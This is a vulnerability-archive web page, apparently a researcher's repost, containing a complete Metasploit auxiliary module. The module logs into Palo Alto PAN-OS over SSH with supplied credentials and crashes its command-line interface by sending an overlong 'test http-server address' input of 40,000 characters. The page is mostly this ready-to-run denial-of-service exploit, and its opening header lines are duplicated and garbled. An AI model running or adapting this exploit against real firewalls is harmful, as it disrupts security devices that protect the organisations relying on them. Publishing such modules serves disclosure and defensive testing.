Latest Tech

Latest Posts

Palo Alto PAN-OS CLI Crash

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 389
Palo Alto PAN-OS CLI Crash
Palo Alto PAN-OS CLI Crash
##
# This module requires Metasploit Framework and compatible Ruby.
##

require 'msf/core'
require ##
# This module requires Metasploit Framework and compatible Ruby.
##

require 'msf/core'
require 'net/ssh'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(update_info(info,
'Name' => 'Palo Alto PAN-OS CLI Crash (Post-Auth)',
'Description' => %q{
This module triggers a denial-of-service condition in the CLI of
Palo Alto PAN-OS by sending an overly long input after authentication.
},
'Author' => [ 'Cody Sixteen' ],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://code610.blogspot.com/2025/05/palo-alto-postauth-cli-memory.html']
],
'DisclosureDate' => 'May 25 2025'
))

register_options(
[
Opt::RPORT(22),
OptString.new('USERNAME', [true, 'SSH username']),
OptString.new('PASSWORD', [true, 'SSH password'])
]
)
end

def run_host(ip)
rport = datastore['RPORT']

begin
print_status("[*] Connecting to #{ip}:#{rport} via SSH...")
Net::SSH.start(ip, datastore['USERNAME'], password: datastore['PASSWORD'], port: rport, non_interactive: true, timeout: 10) do |ssh|
print_good("[+] SSH connection established to #{ip}")

ssh.open_channel do |channel|
pty_opts = { term: 'xterm', chars_wide: 80, chars_high: 24, modes: {} }

channel.request_pty(pty_opts) do |pty, success|
if success
print_good("[+] PTY successfully allocated")

channel.send_channel_request("shell") do |ch, success_shell|
if success_shell
print_good("[+] Shell channel opened. Sending payload...")

crash_cmd = "test http-server address " + "A" * 40000 + "\n"
channel.send_data(crash_cmd)

channel.on_data do |_ch, data|
print_line("[remote] #{data}")
end

channel.on_extended_data do |_ch, type, data|
print_line("[remote][stderr] #{data}")
end

# send exit after 1 sec. (time for payload to load)
Rex.sleep(1)
channel.send_data("exit\n")
else
print_error("[-] Failed to open shell channel")
end
end
else
print_error("[-] PTY request failed")
end
end

channel.on_close do |_ch|
print_status("[*] SSH channel closed.")
end
end

ssh.loop
end
rescue Net::SSH::AuthenticationFailed
print_error("[-] Authentication failed for #{ip}")
rescue Net::SSH::Exception => e
print_error("[-] SSH connection error with #{ip}: #{e.message}")
rescue => e
print_error("[-] Unexpected error: #{e.message}")
end
end
end

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.